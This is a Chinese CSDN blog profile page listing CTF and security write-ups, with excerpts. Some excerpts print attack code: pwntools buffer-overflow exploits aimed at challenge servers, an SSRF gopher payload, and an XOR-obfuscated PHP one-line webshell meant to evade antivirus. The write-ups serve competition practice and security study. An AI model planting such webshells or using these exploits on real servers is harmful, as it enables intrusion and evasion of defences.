自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(51)
  • 收藏
  • 关注

原创 宝塔+php+ssh+vscode+虚拟机 远程调试

宝塔+php+VScode+XDebug远程调试方法

2024-02-05 22:17:55 715

原创 csdn图床批量转腾讯图床

以前写的blog用的csdn的图床,这两天突然不能用了,写个脚本批量把csdn的图片传到腾讯的图床上。

2023-03-16 22:44:11 347 1

原创 ATT&CK红队评估实战靶场(二)

前言第二个靶机来喽,地址:vulunstack环境配置大喊一声我淦!!!!!配个网络配置弄了半天配置信息DCIP:10.10.10.10OS:Windows 2012(64)应用:AD域WEBIP1:10.10.10.80IP2:192.168.47.131OS:Windows 2008(64)应用:Weblogic 10.3.6MSSQL 2008PCIP1:10.10.10.201IP2:192.168.47.130OS:Windows 7(32)攻

2023-03-14 22:09:53 1825 2

原创 off-by-one (b00ks)

off_by_one

2022-11-18 22:45:17 1249

原创 第五空间 一道sqlite

sqlite

2022-09-19 20:33:17 212

原创 BUU-pwn(六)

BUU-pwn(六)

2022-09-14 23:44:23 245

原创 BUU-pwn(五)

BUU-pn(五)

2022-09-10 21:04:43 299

原创 babyheap_0ctf_2017

babyheap_0ctf_2017

2022-09-10 18:00:53 1122

原创 BUU-pwn(四)

BUU-pwn(四)

2022-09-04 23:55:00 183

原创 WMCTF2022 WEB

WMCTF2022-WEB

2022-08-24 23:55:15 1590

原创 强网杯2022 web

强网杯2022web

2022-08-17 00:44:07 753 1

原创 nepctf

nepctf2022

2022-08-17 00:41:14 353

原创 websocket内存马

websocket内存马

2022-08-08 11:50:06 1290 2

原创 ctfshow 终极考核

ctfshow

2022-07-21 19:56:47 1448

原创 ctfshow web入门(phpcve)

ctfshow

2022-07-19 19:18:20 753

原创 ctfshow web入门(SSRF)

ctfshow

2022-07-19 19:18:06 861

原创 ctfshow web入门(代码审计)

ctfshow

2022-07-19 19:17:46 375

原创 ctfshow web入门(java)

ctfshow

2022-07-19 19:17:27 849

原创 ctfshow web入门(php反序列化)

ctfshow

2022-07-19 19:17:13 542

原创 ctfshow web入门 命令执行

ctfshow

2022-07-19 19:16:46 1512

原创 ctfshow web入门(文件包含)

ctfshow

2022-07-19 19:15:15 696

原创 ctfshow web入门(文件上传)

ctfshow 文件上传

2022-07-19 19:13:49 2340

原创 NepCTF2022

nepctf2022 wp

2022-07-19 18:22:59 1253

原创 虚拟机 Ubuntu21 网卡丢失 连接图标消失

ubuntu21网卡消失

2022-07-19 17:59:33 165

原创 JNDI注入之略微学学

jndi注入

2022-07-18 16:24:02 783

原创 2022 DSCTF首届数字空间安全攻防大赛

2022-DSCTF-web

2022-07-17 10:49:29 925 7

原创 BUU-pwn(三)

pwn(三)

2022-06-19 22:57:13 295

原创 Dest0g3 520迎新赛

Dest0g3 520迎新赛

2022-06-17 12:49:22 2423

原创 HackTheBox-CTF2022

Before五天的比赛,总共61道赛题,11道web题目,队友依旧给力,pwn,re,misc等都ak了,最后写出了59道题目,位于7014支队伍的第7名。目前是周四下午18.30,距离比赛结束还有2h,结束五天沉迷解题的状态,下载附件、代码审计、发现异常、搜索漏洞、构造payload、本地测试, 一个字:爽。不过web这回算是个败笔了,差一题AK,啧啧啧,我太菜了Kryptos Support逻辑漏洞XSSThe secret vault used by the Longhir’s ..

2022-05-21 00:24:49 2621

原创 BUU-pwn(二)

ciscn_2019_n_832位程序,逻辑很简单 需要var[13] == 17需要注意的是qword全称是Quad Word。2个字节就是1个Word(1个字,16位),q就是英文quad-这个词根(意思是4)的首字母,所以它自然是word(2字节,0~2^16-1)的四倍,8字节 所以用p64expfrom pwn import *r = remote('node4.buuoj.cn',29396)payload = b'aaaa'*13+p64(0x11)r.sendline(p

2022-04-27 13:57:43 324

原创 第二届网刃杯 WEB

Sign_in一道SSRF看一下网络情况http://124.222.173.163:20003/?url=file:///proc/net/arp访问一下 100,因为长的奇怪绕后就是添加一下XFF,Ref头信息,gopher打过去就好expimport urllib.parsepayload =\"""POST /?a=1 HTTP/1.1Host: bolean.clubContent-Type: application/x-www-form-urlencodedCo

2022-04-26 16:18:17 415

原创 BUU-pwn(一)

rip简单栈溢出,后门函数expfrom pwn import *#io=process("./pwn")r = remote('node4.buuoj.cn',25253)payload=b'a'*0xf+b'a'*0x08+p64(0x0401187)r.sendline(payload)r.interactive()warmup_csaw_2016后门函数 int sub_40060D() 泄露地址expfrom pwn import *#io=process("./pw

2022-04-24 00:40:45 332

原创 *CTF-2022 WEB

oh-my-notepropython3.8 pin码计算发现sql注入,可以堆叠注入生成要素username, 通过getpass.getuser()读取,通过文件读取/etc/passwd modname, 通过getattr(mod,“file”,None)读取,默认值为flask.appappname, 通过getattr(app,“name”,type(app).name)读取,默认值为Flaskmoddir, 在flask库下app..

2022-04-24 00:03:05 920

原创 2022DASCTF X SU 三月春季挑战赛

ezpop<?phpclass crow{ public $v1; public $v2; function eval() { echo new $this->v1($this->v2); } public function __invoke() { $this->v1->world(); }}class fin{ public $f1; public

2022-03-30 11:58:41 843

原创 ROME反序列化分析

title: ROME反序列化categories: java反序列化RomeRome 就是为 RSS聚合开发的框架, 可以提供RSS阅读和发布器。Rome 提供了 ToStringBean 这个类,提供深入的 toString 方法对JavaBean进行操作Calcpackage bytecode;import com.sun.org.apache.xalan.internal.xsltc.DOM;import com.sun.org.apache.xalan.internal.xs.

2022-03-29 23:48:34 661

原创 VishwaCTF 2022

title: VishwaCTF 2022categories: 赛题wp记录两题Flag .Collection一道 firebase 的题目,记录一下首页照例看一下网页源码,截取一下重要部分一段混淆代码,但是有一个url一个firebaseConfig设置通过API KEY操作 firebase,猜测baseURL就是上面的url<!DOCTYPE html><html lang="en"><head> <meta .

2022-03-29 23:43:35 375

原创 php一句话免杀尝试

<?phperror_reporting(0);$a = rad2deg^(3).(2);$b = asin^(2).(6);$c = ceil^(1).(1);$exp = $a.$b.$c; //assert$pi=(is_nan^(6).(4)).(tan^(1).(5)); //_GET$pi=$$pi; //$_GETcall_user_func($exp,$pi{0}($pi{1}));?>利用数学函数进行异或构造,从中寻找可用函数,没找到eval,找到了ass

2022-02-24 18:17:13 635

原创 HGAME 2022 WEB

前言web篇Tetris plus直接搜索alertFujiwara Tofu Shop添加一些头部信息,X-Real-IP: 127.0.0.1蛛蛛…嘿嘿♥我的蛛蛛import requestsfrom lxml import etreeurl = 'https://hgame-spider.vidar.club/be26bf4bdf'r = requests.get(url).texthtmltxt = etree.HTML(r)key = htmltxt.xpath("//

2022-02-17 22:33:44 1304

原创 VNCTF 2022 web

前言复现一下vnctfGameV4.0签到newcalc0源码const express = require("express");const path = require("path");const vm2 = require("vm2");const app = express();app.use(express.urlencoded({ extended: true }));app.use(express.json());app.use(express.static("s

2022-02-16 16:06:31 1691

原创 DefCamp Capture the Flag (D-CTF) 2021-22 web

前言抽空看了下webpara-code4长度rce需要有写权限,但是题目没有写权限,只能爆破一下后面的命令<?phprequire __DIR__ . '/flag.php';if (!isset($_GET['start'])){ show_source(__FILE__); exit;} $blackList = array( 'ss','sc','aa','od','pr','pw','pf','ps','pa','pd','pp','po','pc','p

2022-02-14 19:25:35 694

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除